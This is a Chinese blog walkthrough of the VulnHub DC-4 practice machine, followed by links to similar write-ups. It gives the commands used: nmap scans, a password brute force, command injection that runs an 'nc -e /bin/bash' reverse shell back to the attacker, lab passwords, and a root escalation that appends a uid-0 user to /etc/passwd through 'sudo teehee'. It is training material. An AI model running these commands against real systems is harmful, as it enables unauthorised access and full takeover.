vulnhub-DC4

最新推荐文章于 2024-06-05 17:42:08 发布
最新推荐文章于 2024-06-05 17:42:08 发布
阅读量128 收藏 1
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55129870/article/details/124806426
版权

kaliip :192.168.44.131

主机发现

nmap -sP 192.168.44.0/24

DC4ip: 192.168.44.144

端口扫描

nmap -A -p1-65535 -T4 192.168.44.144

开放80、22端口,对应http,ssh服务

访问http服务

指纹识别

whatweb http://192.168.44.144

 得知,web服务器为nginx 1.15.10

爆破吧,猜测用户名为admin,使用kali的/usr/share/john下的password.lst字典

 

 

 

 尝试登录

 成功

(第二种方法,查看源代码

 发现以post方式提交到login.php页面,直接访问login.php页面)

点击command,

出现

 点击RUN,开启抓包,发送到重发器

 查看请求包,响应包,发现radio处的值嵌入到

尝试修改命令,

 

 开启kali监听,nc -lvnp 4444 

监听使用kali的IP  nc 192.168.44.131 -e /bin/bash

 

 成功,反弹交互shell

python -c 'import pty;pty.spawn("/bin/sh")'

 

 看到三个文件夹,应该是三个用户

 

 只有jim可以进入,并且看到old-passwords.bak文件,既然是密码字典,

就尝试爆破jim用户的密码

得到jim的密码 jibril04

ssh jim@192.168.44.144

 连接成功,并提示有一封邮件,查看

 给出charles用户以及密码,切换用户

charles   ^xHhA&hvim0y

 成功登录,尝试提权

查看用户权限

sudo -l

提示teehee具有root权限

使用teeheem命令创建一个用户uid=0的

sudo teehee -a /etc/passwd

demon::0:0:::/bin/bash

努力挣大钱
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1948
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2946
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
vulnhub-dc4
bqnagus
10-05 1174
vulnhub-dc4靶机复现
vulnhub靶机实战_DC-4
最新发布
Varin
06-05 829
【代码】vulnhub靶机实战_DC-4。
vulnhubdc4
qq_54030686的博客
06-09 576
参考官方文档进行操作 这个靶场和其他的靶场还是有一些区别的,简单描述的话,就是拐弯抹角了,不会直接让你进行提权的操作,这篇官方文档中的有些观点,个人感觉有一些问题主机发现 目标IP为192.16843.138,攻击IP为192.168.43.128 进行端口扫描 目标存在22 ssh端口 80 http端口,话不多说,ssh爆破,掏出top100 未成功爆破,从http(80)端口下手,指纹识别 未识别到相关框架 只存在一个登录框,并且为明文传输,话不多说,掏出破解版bp和top1000,破解版跑的快,
VulnHub系列】DC4
大方子
04-09 693
https://note.youdao.com/s/FdSgf6NE
vulnhubDC4靶机
LainWith的博客
08-15 1087
靶机概览信息收集nmap信息收集爆破后台使用字典爆破登进后台命令注入漏洞敏感信息收集SSH爆破SSH登录提权创建一个管理员以管理员身份登录 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-4,313/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC3的MAC,这样做主机发现时可以通过.
靶机实操:vulnhub-DC4
不想当脚本小子的脚本小子
12-07 206
照例先信息收集:IP:192.168.249.137 开放了22ssh端口以及80端口,web服务器的nginx1.15.10,主界面是一个登录框(能否sql注入?能否暴力破解?)。 看看 ngnix有没有什么漏洞,发现没有: 扫后台也没得到什么有效的信息: 看看网页源码有没有什么提示,还是没有什么有价值的,那就只能直接爆破了,这里我使用burpsuite来抓包爆破 这里我使用的是john里面的字典,因为我觉得一个靶机可能,不值得一个几十个G的密码字典来爆: 最后登录成
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1623
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
VulnHub DC-1
weixin_45682839的博客
04-13 346
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 437
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
vulnhub系列靶机--DC4
cyzCc的博客
02-23 802
vulnhub系列靶机–DC4 1.使用nmap扫描主机ip nmap -sP 192.168.211.1/24 目标靶机的ip为192.168.211.137 2.扫描目标靶机开放的端口服务 nmap -A 192.168.211.137 -p 1-65535 目标靶机开放了22端口和80端口 我们在浏览器上访问80端口 发现一个admin登录框 尝试使用burp爆破,首先找到kali里面...
vulnhub--DC4
baiyexing8的博客
10-14 75
看样子应该要bp爆破密码,网上搜了一下,在kali的/usr/share/john/password.lst里面存在一些适合爆破的密码,可以把它当作bp字典。发现无法使用sudo命令,接下来就没有思路了,看了其他师傅的wp才知道线索在/var/mail里。加上前面nmap扫到的ssh端口,让我们联想到了刷dc-2的时候用过的hydra爆破。发现/usr/bin/teehee可以使用root权限,使用teehee提权。有个command,点进去发现能查询一些用户信息,尝试用bp截获修改。
Vulnhub DC-4
Pai_Space
02-17 593
描述: 只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。 192.168.37.133 直接 submit 就可以登录 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f ...
VulnHub DC4
baynk的博客
05-18 350
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-4,313/ 下载地址2:https://pan.baidu.com/s/1VSecvfMlV7dN1-W7YlxrHg 提取码: tiwz 只有一个flag,但是给了多个切入点。 开肝。 0x01 渗透流程 nmap走起 服务端口继续扫 这次有两个端口存在,不可能ssh弱密码吧,还是先来80了。 只有这么一个登陆界面,试了SQL什么都没反应,sqlmap也一把梭过了,啥都没。通过页面的信息收集也找
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1155
vulnhub之dc-4详细步骤
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1767
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub渗透靶机系列----DC4
m0_67284865的博客
08-18 121
vulnhub详细步骤解析,Vulnhub渗透靶机系列----DC4
vulnhub靶机渗透DC-4
RestoreJustice的博客
03-17 164
密码错误为:499字节大小的包)192.168.80.132 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.132。下载地址:https://www.vulnhub.com/entry/dc-4,313/
DC-DC电源模块工作原理详解
"DC-DC电源模块是一种将直流电转换为另一固定或可调直流电的设备,广泛应用在各种电子设备中。它的工作原理主要涉及高频开关、滤波、控制和储能等环节,以实现高效、小型化和稳定的电源供应。" DC-DC电源模块的核心...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值